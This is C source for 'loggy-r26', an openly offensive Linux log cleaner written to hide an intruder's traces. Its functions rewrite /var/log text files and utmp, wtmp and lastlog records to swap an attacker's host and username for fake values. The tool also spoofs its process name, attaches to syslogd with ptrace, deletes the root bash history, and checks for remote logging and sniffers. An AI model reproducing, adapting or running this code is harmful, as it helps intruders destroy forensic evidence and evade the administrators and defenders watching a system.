/* loggy-r26 v0.1.4 - linux advanced logcleaner coded by Marco Costantino 'evil' (eviltime.com)
 *
 * Copyright (C) 2006 eviltime.com
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation;
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * for any question mail me <webmaster@eviltime.com>, 
 * type ./lr26 -h or visit www.eviltime.com
 */

#include "../includes/locals.h"    // local general defines
#include "../includes/path.h"      // internal header file (paths for bin logs)
#include "../includes/functions.h" // loggy's functions

#include <stdio.h>
#include <stdlib.h>    // exit()
#include <string.h>    // strchr(), strstr(), strcpy(), strtok()
#include <sys/types.h> // stat(), open()
#include <sys/stat.h>  // stat(), open()
#include <sys/uio.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <unistd.h>    // stat(), getopt(), getwd()
#include <fcntl.h>     // open()
#include <utmp.h>      // lastlog
#include <signal.h>    // signal() and kill()

#define VERSION "0.1.4"
#define AUTHOR  "evil"

struct flags {
	int backup;
	int sys_hup;
	char *sys_pid;
} option;

int logcount = 0, logsaved = 0;
int type = 0;

char *syslog_path[] = { "/etc/syslog.conf",
			"/etc/syslog-ng.conf", // syslog configuration file
			0 };  

char *txt_listdir = "/var/log/";               // log directory
char wipe[1024];

int main(int argc, char **argv) {
	int pid = 0, c;

	struct cleanerinfo {
		char string[SIZE_STR];
		char fakestring[SIZE_STR];
		char name[SIZE_NAME];
		char proc_n[20];
	} me;

	strncpy(me.fakestring, " ", sizeof(me.fakestring));
	strncpy(me.proc_n, argv[0], sizeof(me.proc_n));
	memset(me.name, '\0', sizeof(me.name));

	printf("\n(*) loggy-r26 v%s (purevil) has been started, sit down and have a drink..\n", VERSION); 
	if (getuid() != 0) { printf("\terror: uid != 0\n\n"); }
	if (argc == 1) { 
		printf("\terror: bad usage, try %s -h\n\n", argv[0]);
		exit(0);
	}

	//setvbuf(stdin, NULL, _IONBF, 0);

	while((c = getopt(argc, argv, "hat:s:d:n:f:l:D:BP")) != EOF) {
		switch(c) {
			case 'h': usage(argv[0]); break;
			case 't': type = atoi(optarg); if(type>1) { usage(argv[0]); } break;
			case 's': strncpy(me.string, optarg, sizeof(me.string)); break;
			case 'a': option.sys_hup = 1; break;
			case 'l': syslog_path[type] = optarg; break;
			case 'd': txt_listdir = optarg; break;
			case 'n': strncpy(me.name, optarg, sizeof(me.name)); break;
			case 'f': strncpy(me.fakestring, optarg, sizeof(me.fakestring)); break;

			case 'D': strncpy(me.proc_n, optarg, sizeof(me.proc_n)); break;
			case 'B': option.backup = 1; break;
			case 'P': option.sys_pid = getepid("syslogd"); break;

			default: printf("\terror: bad usage, try %s -h\n\n", argv[0]); exit(0);
		}
	} 

	if(!me.string) { 
		printf("\terror: bad usage, try %s -h\n\n", argv[0]); 
		exit(0);
	}


	if(option.sys_pid) pid = fork();	
	if(pid == 0)
		execl("lr26-ptrace", "./lr26-ptrace", option.sys_pid, me.string, 0);
 	else { 
		argv[0] = me.proc_n;
		printf("\n\t-argv[0]: %s\n", argv[0]);

		checkRoot();
		txtEngine(me.string, me.fakestring);
		binLastlog(me.string, me.fakestring);
		binTmp(me.string, me.fakestring, me.name, _UTMP);
		binTmp(me.string, me.fakestring, me.name, _WTMP);

		checkSyslog();
		checkSniff();
		printf("\n\t-%d matches cleaned", logcount);

		if(option.backup) printf("\n\t-%d log backups succesfully saved\n", logsaved);

		printf("\n\t-do you want to unlink() history files? (y/n) [n] ");
		if(getchar()=='y') {
			unlink("/root/.bash_history");
			printf("\t-(done)\n");
		}

		if(option.sys_pid) kill(pid, SIGKILL);
		if(option.sys_hup) { 
			system("killall -HUP syslogd");
			printf("\t-syslogd: rehashed\n");
		}
		printf("\n");
	}
}


void txtEngine(char *host, char *hostfake) {
	FILE *flogs, *isbin;
	char buffer[SIZE_BUFF], output[SIZE_BUFF];
	char logname[240];                  // listdir+txtfile merge result
	char gencmd[SIZE_CMD] = {"\0"};     // generic command merge result

	snprintf(gencmd, sizeof(gencmd)-1, "ls -a %s", txt_listdir);

	printf("\n\t-engine is searching for potential txt logs in %s ...\n", txt_listdir);
	flogs = popen(gencmd, "r");                               // reads output of ls -l 'listdir'
	while (fgets(buffer, sizeof(buffer)-1, flogs)) {          // puts into 'buffer' the command output line by line
		snprintf(logname, sizeof(logname)-1, "%s%s", txt_listdir, buffer);
		snprintf(gencmd, sizeof(gencmd)-1, "file %s", logname);
		isbin = popen(gencmd, "r");
		while (fgets(output, sizeof(output)-1, isbin)) {
			if(((strstr(output,"text")) || (strstr(output, "ASCII"))) && (!strstr(output, "Non-ISO")))
				txtWipe(logname, host, hostfake);
		}
		pclose(isbin);
	}
	pclose(flogs);
}

void txtWipe(char *logname, char *host, char *hostfake) {
	FILE *txtlog, *tmplog;

	char buffer[SIZE_BUFF];
	char *buff_c[2];
	char *plogname = NULL;
	char *escape;

	size_t sHost, sFake, sString;

 	buff_c[0]=(char *) malloc(SIZE_BUFF);
	buff_c[1]=(char *) malloc(SIZE_BUFF);

	plogname = strchr(logname, '\n');              // points to the mem addr where the first '\n' is located
	if (*plogname == '\n') *plogname = '\0';       // if true, changes 'n' operand with an end string byte
	else return;
	
	sHost = sizeof(host);
	sFake = sizeof(hostfake);


	txtlog = fopen(logname, "r");
	if (txtlog == 0) { printf("\terror: cannot open %s\n\n", logname); }

	snprintf(TEMP_LOG, sizeof(TEMP_LOG), "%d.tmp", rand());
	tmplog = fopen(TEMP_LOG, "w");
	if (tmplog == 0) printf("\terror: cannot open temp file\n\n");
	else {
		printf("\t-text log '%s' was(%d bytes) ", logname, logsize(logname));

		if(option.backup) logbackup(logname);

		while (fgets(buffer, sizeof(buffer)-1, txtlog) != NULL) {
			for(escape=strtok(buffer, " "); escape!=NULL; escape=strtok(NULL, " ")) {
				strcpy(buff_c[0], escape);
				if ((strstr(buff_c[0],host))==NULL) {     // if the buffer doesn't contain our string
					fputs(buff_c[0],tmplog);   // we put it in the modified log
					if((!strchr(buff_c[0], '\n')) || (!strchr(buff_c[0], '\0'))) fputs(" ",tmplog);
				} else {
					strsub(buff_c[0], host, hostfake);
					fputs(wipe,tmplog); 
					fputs(" ",tmplog);	
					logcount++;             // increases the logfile counter
				}
			}
		}
	}

	fclose(txtlog);
	fclose(tmplog);

	rename(TEMP_LOG, logname);
	printf("is(%d bytes)\n", logsize(logname));
}

int logsize(char *path) {
	struct stat temp;
	int size = -1;

	if (stat(path,&temp) == 0)
		size = temp.st_size;

	return size;
}

void binTmp(char *host, char *fakehost, char *fakename, char *path) {
	int fd;
	struct utmp ulog;

	/* <utmp.h>
	 * struct utmp { 
	 *	short int ut_type;          // Type of login.
	 *	pid_t ut_pid;               // Process ID of login process.
	 *	char ut_line[UT_LINESIZE];  // Devicename.
	 *	char ut_id[4];              // Inittab ID.
	 *	char ut_user[UT_NAMESIZE];  // Username. 
	 *	char ut_host[UT_HOSTSIZE];  // Hostname for remote login.
	 *	struct exit_status ut_exit; // Exit status of a process marked as DEAD_PROCESS.
	 *	long int ut_session;        // Session ID, used for windowing.
	 *	struct timeval ut_tv;       // Time entry was made.
	 *	int32_t ut_addr_v6[4];      // Internet address of remote host.
	 *	char __unused[20];          // Reserved for future use.
	 * };
	 */ 

	if ((fd=open(path, O_RDWR)) < 0) {   // open utmp in read-write
		printf("\terror: cannot open %s\n\n", path);
		close(fd);
	} else {
		printf("\t-bin log '%s'\n", path, logsize(path));
		while(read(fd, &ulog, sizeof(struct utmp)) > 0) {          // puts info in ulog struct
			if(strncmp(ulog.ut_host, host, strlen(host))==0) {   // compares our string with the ut_host string 
				logcount++;
				memcpy(ulog.ut_host, fakehost, strlen(ulog.ut_host));   // moves fakehost into ut_host
				if(strcmp(fakename,"")) { memcpy(ulog.ut_name, fakename, strlen(ulog.ut_name)); }
				lseek(fd, -(sizeof(struct utmp)), SEEK_CUR);            // replace SEEK_CUR
				write(fd, &ulog, sizeof(ulog));                         // replace the entire struct
			}
		}

	close(fd);

	}
	

}
	
void binLastlog(char *host, char *fakehost) {
	int fd;
	struct lastlog llog;

	/* <utmp.h> 
	 * struct lastlog { 
	 *	__time_t ll_time; 
	 *	char ll_line[UT_LINESIZE]; 
	 *	char ll_host[UT_HOSTSIZE]; 
	 * };
	 */
	
	if ((fd=open(_LASTLOG, O_RDWR)) < 0) {   // open lastlog in read-write
		printf("\terror: cannot open %s", _LASTLOG);
		close(fd);
	} else {
		printf("\t-bin log '%s'\n", _LASTLOG, logsize(_LASTLOG));
		while(read(fd, &llog, sizeof(struct lastlog)) > 0) {       // puts info in llog struct
			if(strncmp(llog.ll_host, host, strlen(host))==0) {   // compares our string with the ll_host string 
				logcount++;
				memcpy(llog.ll_host, fakehost, strlen(llog.ll_host));   // moves fakehost into ll_host
				lseek(fd, -(sizeof(struct lastlog)), SEEK_CUR);         // replace SEEK_CUR
				write(fd, &llog, sizeof(llog));                         // replace the entire struct
			}
		}

	close(fd);

	}
}

void checkSyslog() {
	FILE *sysconf;

	int remote = 0;
	char buffer[SIZE_BUFF];

	if (type == 0) {
		sysconf = fopen(syslog_path[0], "r");

		if (sysconf == 0) { 
			printf("\n\t-syslog: unable to read %s (trying with syslog-ng)\n", syslog_path[0]);
			type++;
		} else {
			printf("\n\t-checking syslog rules");
			while (fgets(buffer, sizeof(buffer)-1, sysconf) != NULL) {
				if (strstr(buffer,"@")) { printf("\n\t\t-remote logging: %s", buffer); remote=1; }
			}
			if(remote == 0) printf("\n\t\t-remote logging: no\n");
			fclose(sysconf);
		}

	}
	if (type == 1) {
		sysconf = fopen(syslog_path[1], "r");
		if (sysconf == 0) { printf("\n\t-syslog-ng: unable to read %s\n", syslog_path[1]); }

		else {
			printf("\n\t-checking syslog-ng rules\n");
			while (fgets(buffer, sizeof(buffer)-1, sysconf) != NULL) {
				if (strstr(buffer,"tcp")) { printf("\t\t-remote TCP logging: %s", buffer); remote=1; }
				if (strstr(buffer,"udp")) { printf("\t\t-remote UDP logging: %s", buffer); remote=1; }
				if (strstr(buffer,"usertty")) { printf("\t\t-remote TTY logging: %s", buffer); remote=1; }
				if (strstr(buffer,"file")) { printf("\t\t-extra logfile: %s", buffer); }
			}
			if(remote == 0) printf("\n\t\t-remote logging: no\n");
			fclose(sysconf);
		}
	}
}


void checkSniff() {
	int fd, intface, prom_dev = 0;
	struct ifreq buf[16];
	struct ifconf ifc;

	if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) >= 0) {
		ifc.ifc_len = sizeof buf;
		ifc.ifc_buf = (caddr_t) buf;

		if (!(ioctl (fd, SIOCGIFCONF, (char *) &ifc))) {
			intface = ifc.ifc_len / sizeof (struct ifreq);

			if (!intface) {
				fprintf(stderr, "\n\t-error: no interfaces found.\n");
				close(fd);
				return;
			}

			printf("\n\t-checking for sniffers\n");
			while (intface-- > 0) {
		    		fprintf(stderr,"\t\t%s: ", buf[intface].ifr_name);
				if (!(ioctl(fd, SIOCGIFFLAGS, (char *) &buf[intface]))) {
					if (buf[intface].ifr_flags & IFF_PROMISC) {
						(void)fprintf (stderr, "promiscuous mode, possible running sniffer\n");
						prom_dev++;
					} else {
						fprintf (stderr, " no promiscuous\n");
					}
				}
			}
		}
		close(fd);
	}
}

void checkRoot(void) {
	static struct utmp *entry;
	int user = 0, root = 0;


	setutent();
	while ((entry = getutent())!=NULL) {
		if (entry->ut_type != USER_PROCESS)
			continue;
		user++;

		if (!strcmp(entry->ut_user, "root"))
			root++;
	}

	printf("\t-monitor: %d user(s) logged in, %d root login(s)\n", user, root);

	endutent();
}

char *getepid(char *process) {
	FILE *ps;
	char cmd[15], *extpid = (char *) malloc(10);

	snprintf(cmd, sizeof(cmd), "pgrep %s", process);
	
	ps = popen(cmd, "r");
	memset(extpid, 0, sizeof(extpid));
	fread(extpid, 10, 1, ps);
	if(!extpid) { printf("\n\t-error: cannot get %s pid\n", process); exit(0); }
	pclose(ps);
	
	return(extpid);
}

int logbackup(char *logname) {
	FILE *txtlog, *tmplog;
	char *logname_p;
	char logn[50], logdir[SIZE_BUFF];
	char buffer[SIZE_BUFF];

	strncpy(logdir, logname, sizeof(logdir));

	for(logname_p=strtok(logdir, "/"); logname_p!=NULL; logname_p=strtok(NULL, "/")) {
		/* gets the name of the log without the complete PATH
		   finally 'logn' will contains the word after the last '/' character */

		strncpy(logn, logname_p, sizeof(logn));
	}
	
	txtlog = fopen(logname, "r");
	if (txtlog == 0) { 
		printf("\terror: cannot read %s\n\n", logname);
		return -1;
	}

	tmplog = fopen(logn, "w");
	if (tmplog == 0) { 
		printf("\terror: cannot write %s\n\n", logn);
		return -1;
	}

	while (fgets(buffer, sizeof(buffer)-1, txtlog)!=NULL)
		fputs(buffer, tmplog);

	fclose(tmplog);
	fclose(txtlog);

	logsaved++;	// increases the log backup counter
}

void strsub(char *string, const char *host, const char *hostfake) {
	size_t sString, sHost, sFake, sTot, sPointer, sTemp;
	char *wipe_pointer;
	char *string_pointer;

	string_pointer = 0;

	sString = strlen(string);
	sHost = strlen(host);
	sFake = strlen(hostfake);
	sTot = sString - sHost + sFake + 4;

	string_pointer = strstr(string, host);
	
	wipe_pointer = wipe;	
	sPointer = strlen(string_pointer);
	sTemp = sString - sPointer;
   
	memcpy(wipe_pointer, string, sTemp);
	wipe_pointer = wipe_pointer + sTemp;
	memcpy(wipe_pointer, hostfake, sFake);
	wipe_pointer = wipe_pointer + sFake;

	string_pointer = string_pointer + sHost;
	sPointer = strlen(string_pointer);
	memcpy(wipe_pointer, string_pointer, sPointer);
}

void usage(char *program) {
	printf("\n\t-usage: %s -s <string> [options]\n", program);
	printf("\t-options:\n");
	printf("\t\t-d <directory> changes the log directory (default: %s)\n", txt_listdir);
	printf("\t\t-f <string> changes your string_pointer with another one\n");
	printf("\t\t-n <name> changes your logged name (utmp/lastlog) with another\n");
	printf("\t\t-l <directory> changes the syslogd directory (default: syslog)\n");
	printf("\t\t-t <type> change the syslog type (default: [0 syslog], 1 syslog-ng)\n");
	printf("\t\t-a enables syslogd rehash (default: disabled)\n");
	printf("\n\t\t-D <name> argv[0] name spoofing\n");
	printf("\t\t-P <syslog pid> PTRACE_ATTACH on syslogd during the cleaning\n");
	printf("\t\t-B creates a backup of the original logs\n");
	printf("\n");
	exit(0);
}

/* huh! someone is reading my own dirty source! */

